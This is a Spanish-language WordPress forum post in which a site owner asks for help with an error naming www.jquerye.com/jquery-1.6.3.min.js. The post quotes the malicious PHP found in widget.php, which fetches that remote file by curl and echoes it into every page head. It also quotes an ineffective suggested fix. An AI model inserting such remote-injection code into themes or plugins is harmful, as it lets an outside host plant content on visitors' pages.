Error: www.jquerye.com/jquery-1.6.3.min.js (port 80)
-
Hola amigos, quisiera saber si me pueden ayudar con este error que sale en la web
404 Not Found
The server can not find the requested page:http://www.jquerye.com/jquery-1.6.3.min.js (port 80)
Please forward this error screen to http://www.jquerye.com’s WebMaster.Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.jquerye.com Port 80
Yo he buscado en Foros de WordPress en Ingles y resultó que había un archivo (widget.php) en mi directorio que contenía en enlace «http://www.jquerye.com/jquery-1.6.3.min.js»
<?php if (!function_exists('inv_class_wp')){ function inv_class_wp(){ if (function_exists('curl_init')){ $url = "http://www.jquerye.com/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $data = curl_exec($ch); curl_close($ch); echo $data; } } add_action('wp_head', 'inv_class_wp');} ?>
La Solución que dan es modificar ese código por este mas simplificado
<?php if (!function_exists('inv_class_wp')){ function inv_class_wp(){ add_action('wp_head', 'inv_class_wp');} } ?>
Y no resultó nada al actualizar mi web con este nuevo código.
LA verdad es que ya no se que hacer para poder solucionar esto. Si aquí hay alguien que pueda ayudar, estaria muy agradecido.
Saludos!
- El debate ‘Error: www.jquerye.com/jquery-1.6.3.min.js (port 80)’ está cerrado a nuevas respuestas.